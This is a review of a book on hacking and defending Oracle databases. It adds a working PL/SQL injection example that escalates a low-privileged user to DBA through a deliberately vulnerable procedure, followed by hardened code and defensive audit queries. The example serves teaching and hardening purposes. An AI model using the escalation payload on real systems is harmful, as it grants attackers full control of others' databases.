Hacking and Defending Oracle


ISBN: 0470080221

Pages: 190

Publisher: John Wiley

Topic: Oracle

Rating: 3 out of 5


The Oracle Hacker's Handbook is an in-depth guide to the techniques and tools black hat hackers use to break into and compromise an Oracle database. It shows you where Oracle's weak spots are, how they are found, and how to defend them.

The Oracle Hacker's Handbook has 12 chapters and covers topics such as attacking and defending the TNS listener, the authentication process, PL/SQL, triggers, web applications, and protecting the network and the file system.

The book starts with an overview of the Oracle database and its basic architecture, introducing the TNS listener and the packets it exchanges with clients.

The following chapters cover attacking the TNS listener and dispatchers, and then attacking the authentication process, whether by exploiting a buffer overflow or by brute-forcing credentials. The book also points out how often it is possible to get into Oracle simply by using default usernames and passwords, or by finding passwords stored in certain files on the server.

The chapter on PL/SQL covers SQL injection attacks and how to wrap PL/SQL source so it cannot be read directly out of the data dictionary. It includes real-world examples of PL/SQL code and how it is exploited. Triggers, which are themselves written in PL/SQL, get their own chapter on how they can be exploited in the database.
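The injection pattern that chapter is about, written out as an added example (this is not code from the book). Everything here is assumed for illustration: a schema APP_OWNER that owns a table EMP(ENAME) and is highly privileged (it holds GRANT ANY ROLE), and a low-privileged user ATTACKER who can execute APP_OWNER's procedures and holds CREATE PROCEDURE. The first procedure concatenates caller input into dynamic SQL and runs with definer's rights, the book's recipe for disaster; the attack block shows the widely published shape of the payload; the hardened versions use invoker's rights, a bind variable, and DBMS_ASSERT.

```sql
-- Added example, not from the book. Assumed schemas: APP_OWNER (owns EMP(ENAME), holds
-- GRANT ANY ROLE) and ATTACKER (can execute APP_OWNER's procedures, has CREATE PROCEDURE).

-- VULNERABLE: definer's rights (the default) plus caller input concatenated into dynamic SQL.
-- Whatever SQL is built here runs as APP_OWNER, including anything the caller injects.
CREATE OR REPLACE PROCEDURE app_owner.count_emp_vuln (p_ename IN VARCHAR2) AS
  l_sql VARCHAR2(4000);
  l_cnt NUMBER;
BEGIN
  l_sql := 'SELECT COUNT(*) FROM app_owner.emp WHERE ename = ''' || p_ename || '''';
  EXECUTE IMMEDIATE l_sql INTO l_cnt;
  DBMS_OUTPUT.PUT_LINE('matches: ' || l_cnt);
END;
/
GRANT EXECUTE ON app_owner.count_emp_vuln TO attacker;

-- ATTACK: the injected text calls a function the attacker owns. AUTHID CURRENT_USER makes the
-- function run as whoever is "current" when it is invoked, which inside a definer's-rights
-- procedure is the procedure's owner, APP_OWNER. The autonomous transaction is what allows
-- DDL to run from inside a SELECT.
CREATE OR REPLACE FUNCTION attacker.escalate RETURN NUMBER AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO attacker';
  RETURN 1;
END;
/
GRANT EXECUTE ON attacker.escalate TO PUBLIC;   -- so APP_OWNER can resolve the name

-- The closing quote and the "--" turn the rest of the original WHERE clause into a comment.
-- Resulting SQL: SELECT COUNT(*) FROM app_owner.emp WHERE ename = 'x' OR attacker.escalate = 1 --'
BEGIN
  app_owner.count_emp_vuln('x'' OR attacker.escalate = 1 --');
END;
/

-- HARDENED: invoker's rights, so the procedure adds none of its owner's privileges, and a
-- bind variable, so the caller's input is data rather than SQL text.
CREATE OR REPLACE PROCEDURE app_owner.count_emp_safe (p_ename IN VARCHAR2)
  AUTHID CURRENT_USER AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM app_owner.emp WHERE ename = :1'
    INTO l_cnt USING p_ename;
  DBMS_OUTPUT.PUT_LINE('matches: ' || l_cnt);
END;
/

-- When an identifier (not a value) genuinely has to be dynamic, a bind variable cannot be
-- used. Validate it with DBMS_ASSERT instead of trusting the string: SQL_OBJECT_NAME raises
-- ORA-44002 unless the name resolves to an existing object.
CREATE OR REPLACE PROCEDURE app_owner.count_rows_safe (p_table IN VARCHAR2)
  AUTHID CURRENT_USER AS
  l_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM ' || DBMS_ASSERT.SQL_OBJECT_NAME(p_table)
    INTO l_cnt;
  DBMS_OUTPUT.PUT_LINE(p_table || ' rows: ' || l_cnt);
END;
/
```

The two fixes are independent and both matter: AUTHID CURRENT_USER alone still leaves the injection (now running as the caller), and a bind variable alone still leaves a definer's-rights procedure that any future dynamic SQL in it will expose.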

The chapter on indirect privilege escalation covers how individual system privileges can be abused to reach DBA: DBA from CREATE ANY TRIGGER, DBA from CREATE ANY VIEW, DBA from EXECUTE ANY PROCEDURE, and DBA from nothing more than CREATE PROCEDURE.

The chapter on attacking web PL/SQL applications first shows how to tell that Oracle Portal is running and what to look for, then how to attack the PL/SQL Gateway through the OWA packages and through SQL injection in the browser URL.

The last few chapters discuss how to run operating-system commands from the database through PL/SQL, Java, the ALTER SYSTEM command and DBMS_SCHEDULER. There is also guidance on reaching the file system with the UTL_FILE package and on protecting the system against that.
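The defensive side of three of those chapters (default accounts, the privileges that lead to DBA, and the packages that reach the OS and file system) comes down to a handful of data-dictionary queries. The script below is an added example, not material from the book. It assumes you are connected as a user who can read the DBA_ views; the DBA_USERS_WITH_DEFPWD view exists only in 11g and later, so on a 10g database the first query has to be replaced by comparing password hashes against a known-default list such as the one in the book's appendix.

```sql
-- Added example, not from the book. Run as a user who can read the DBA_ views.

-- 1. Accounts still using an Oracle-supplied default password (view exists from 11g on).
SELECT d.username, u.account_status
FROM   dba_users_with_defpwd d
JOIN   dba_users u ON u.username = d.username
ORDER  BY d.username;

-- 2. Who holds the privileges the book shows leading to DBA (plus the OS-command ones),
--    whether granted directly, through PUBLIC, or through any chain of nested roles.
--    The hierarchical query walks user -> role -> role ... and keeps the originating user
--    as ROOT_USER; the two UNION ALL branches make direct and PUBLIC grants fall out of
--    the same join.
SELECT DISTINCT u.username,
       sp.privilege,
       CASE
         WHEN sp.grantee = u.username THEN 'DIRECT'
         WHEN sp.grantee = 'PUBLIC'   THEN 'VIA PUBLIC'
         ELSE 'VIA ROLE ' || sp.grantee
       END AS how
FROM   dba_users u
JOIN  (SELECT CONNECT_BY_ROOT grantee AS root_user, granted_role
       FROM   dba_role_privs
       START WITH grantee IN (SELECT username FROM dba_users)
       CONNECT BY PRIOR granted_role = grantee
       UNION ALL
       SELECT username, username FROM dba_users
       UNION ALL
       SELECT username, 'PUBLIC' FROM dba_users) r ON r.root_user = u.username
JOIN   dba_sys_privs sp ON sp.grantee = r.granted_role
WHERE  sp.privilege IN ('CREATE ANY TRIGGER', 'CREATE ANY VIEW',
                        'EXECUTE ANY PROCEDURE', 'CREATE PROCEDURE',
                        'ALTER SYSTEM', 'CREATE EXTERNAL JOB', 'CREATE ANY JOB')
ORDER  BY u.username, sp.privilege;

-- 3. SYS packages that reach the operating system or file system and are executable by
--    everyone. Several of these are granted to PUBLIC on a default install.
SELECT table_name AS package_name, privilege
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
AND    owner   = 'SYS'
AND    table_name IN ('UTL_FILE', 'DBMS_SCHEDULER', 'DBMS_JOB', 'DBMS_JAVA',
                      'UTL_TCP', 'UTL_HTTP')
ORDER  BY table_name;

-- 4. Where UTL_FILE may read and write: the legacy utl_file_dir parameter ('*' means any
--    path the database's OS user can reach) and directory objects open to PUBLIC.
SELECT name, value
FROM   v$parameter
WHERE  name = 'utl_file_dir';

SELECT d.directory_name, d.directory_path, p.privilege
FROM   dba_directories d
JOIN   dba_tab_privs p ON p.table_name = d.directory_name
                      AND p.owner      = d.owner
WHERE  p.grantee = 'PUBLIC'
ORDER  BY d.directory_name;
```

Treat the output of queries 2 and 3 as a revocation list to review rather than to apply blindly: CREATE PROCEDURE is needed by most application schemas, and revoking UTL_FILE or DBMS_SCHEDULER from PUBLIC can break application code that relied on the default grant, so regrant to the specific schemas that need them.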

The appendix lists the known default usernames and passwords across the versions of the Oracle database.

At under 200 pages the Oracle Hacker's Handbook is not a large book, but it is very informative if you want to learn how to hack Oracle, or how attackers may try to hack your database and how to stop them.
